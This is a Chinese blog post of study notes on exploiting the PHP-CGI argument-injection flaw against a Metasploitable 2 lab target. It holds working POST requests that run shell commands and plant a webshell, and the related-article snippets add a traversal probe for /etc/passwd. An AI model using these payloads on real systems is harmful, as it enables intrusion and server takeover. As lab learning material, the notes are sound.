初识漏洞

最新推荐文章于 2024-02-01 16:58:49 发布
最新推荐文章于 2024-02-01 16:58:49 发布
阅读量500 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37027540/article/details/93387196
版权

初识漏洞

php漏洞

  • 靶机是metesploip系统2.0 ,利用一个早期的默认安装的php漏洞(权限只有web应用账号的权限)
  •     POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
    HTTP/1.1
    Host: 192.168.1.103  
    Content-Length: 38
    <?php 
    passthru('id'); 
    die(); 
    ?>
    • 可以直接使用passthru()里面的输入shell命令对靶机进行shell操控
    • 控制了靶机

简单木马

  •     POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
  	HTTP/1.1
    Host: 192.168.1.103  
    Content-Length: 38
    <?php 
 	   passthru('echo "<?php  \$cmd = \$_GET["cmd"];system(\$cmd);?>"  >   /var/www/3.php'); 
 	   die(); 
 	 ?>

最低0.47元/天 解锁文章
lzbzzzzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
弱点扫描
weixin_43229308的博客
12-16 372
exploit database:https://www.exploit-db.com/ nvd(美国国家漏洞数据库):https://nvd.nist.gov/ 完全基于SCAP框架 searchsploit 加关键字搜索漏洞 root@kali:~# searchsploit nginx---------------------------------- --------------...
CVE-2012-1823:phpcgi 代码执行
Foreverlove112的博客
11-08 1142
CVE-2012-1823:phpcgi 代码执行
phpMyAdmin 未授权Getshell
最新发布
蚁景网安学院
02-01 687
做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。环境搭建使用metasploitable2,发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。
CVE-2012-1823漏洞与嚣张的黑客
阿道夫的博客
03-29 324
发现该情况的第一时间已通知用户采取了相应的处置及防护措施,所幸黑客最终没有得逞,未造成严重后果。如果您还在使用以上版本的php,建议及时替换新版本,避免漏洞被黑客利用。在不影响业务的情况下,尽可能减少不必要功能和配置的开启,缩小用户对服务器的可操作空间。图6 NVD CVE-2012-1823影响的php版本范围CVE-2012-1823影响的php版本范围1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。
PHP-CGI远程代码执行
小小猪的博客
11-23 2607
PHP-CGI远程代码执行 漏洞利用知识: CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 环境搭建: 这里采用vulhub环境,参考文件 漏洞利用: 启动漏洞环境 进入 CVE-2012-1823 启动 su...
IBMRationalAppscan初识.pdf
11-25
【IBM Rational AppScan初识】 IBM Rational AppScan是一款强大的自动化安全扫描工具,专门针对Web应用和Web Services进行安全测试。它的核心原理是采用黑盒测试方法,通过模拟各种攻击手段来检测潜在的安全漏洞。...
初识软件工程.pptx
01-05
通过学习“初识软件工程”,学生将理解软件开发的全过程,学习如何有效地管理软件项目,掌握分析、设计、实现和测试的技能,同时了解不同方法论和工具的应用。这不仅有助于提升个人的编程能力,更能培养团队协作和...
1、初识代码审计ppt资料
10-15
代码审计(Code Audit)是一种以发现安全漏洞、程序错误和程序违规为目标的源代码分析技能。在实践过程中,可通过人工审查或者自动化工具的方式,对程序源代码进行检查和分析,发现这些源代码缺陷引发的安全漏洞,并...
初識漏洞開發暨_Windows_緩衝區溢位的攻與防.pdf
08-29
初识漏洞开发暨Windows缓冲区溢出的攻与防】是关于网络安全中一个核心话题的探讨,主要涉及Web安全、数据安全、安全运营以及安全架构。本篇内容由Peter Chi分享,他是一名IBM CDL软件工程师,拥有丰富的计算机安全...
初识SQLMAP API和命令行中调用1
08-03
“本文前言:最近在写一款漏洞检测软件的时候,发现对于SQL注入的一些判断还有测试不是很精准,于是乎我就想到了本文的一个主角,SQLMAPAPI,这个API是SQ
PHP-CGI远程代码执行漏洞(CVE-2012-1823&&CVE-2012-2311)
EC_Carrot的博客
07-18 513
漏洞详细 详细务必请看:https://vulhub.org/#/environments/php/CVE-2012-1823/ 影响版本 php < 5.3.12 or php < 5.4.2 漏洞复现 访问http://your-ip:8080/index.php?-s即爆出源码,说明漏洞存在,我们可以发送以下数据包来执行任意命令: POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input H
手工挖洞学习笔记:phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1038
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
无域名HTTP请求攻击分析
lenchio的专栏
06-16 4180
无域名HTTP请求攻击分析 检测组内WEB服务器攻击日志时,在防护WAF上发现如下攻击记录: http://-c//cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75
【渗透测试笔记】之【手动漏洞挖掘三】
AA8j的博客
07-09 317
Directory traversal/File include 目录遍历(目录权限限制不严)/文件包含漏洞 文件包含漏洞又分为LFI(本地文件包含)和RFI(远程文件包含) 漏洞特征: ?page=a.php ?home=b.html ?file=content 等 不同操作系统的路径特征字符 类Unix 根:/ 目录分级:/ Windows 根:C:\或其他 分级:\或/ 验证方法1: ?page=../../../../../../../../../../../etc/passwd 验证方法2:
ctfshow web入门(phpcve)
qq_53263789的博客
07-19 715
ctfshow
PHP imap 远程命令执行漏洞(CVE-2018-19518)
黑白的博客
12-30 969
声明 好好学习,天天向上 漏洞描述 University of Washington IMAP Toolkit 2007f是美国华盛顿大学(University of Washington)的一款IMAP(Internet消息访问协议)工具包。 基于UNIX平台的University of Washington IMAP Toolkit 2007f中的‘imap_open()’函数存在操作系统命令注入漏洞,该漏洞源于程序没有正确的验证server URI。远程攻击者可借助‘imap_rimap’和‘tcp_
php://input allow_url_include,HTML_PHP教程:allow_url_include,PHP常常因为它可能允许URLS被导 - phpStudy...
weixin_31029019的博客
03-09 231
PHP常常因为它可能允许URLS被导入和执行语句被人们指责。事实上,这件事情并不是很让人感到惊奇,因为这是导致称为Remote URL Include vulnerabilities的php应用程序漏洞的最重要的原因之一。因为这个原因,许多安全研究人员建议在php.ini配置中禁用指向allow_url_fopen。不幸的是,许多推荐这种方法的人,并没有意识到,这样会破坏很多的应用并且并不能保证1...
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
weixin_74149904的博客
10-21 1172
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析。
初识Visual Basic 6.0:入门与开发环境介绍
"该资源是关于入门Visual Basic 6.0的教程,主要涵盖了VB的历史、开发环境、工程管理以及如何创建第一个应用程序。" 在计算机编程领域,Visual Basic 6.0(VB6.0)是一个至关重要的里程碑,它是微软公司于1998年...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值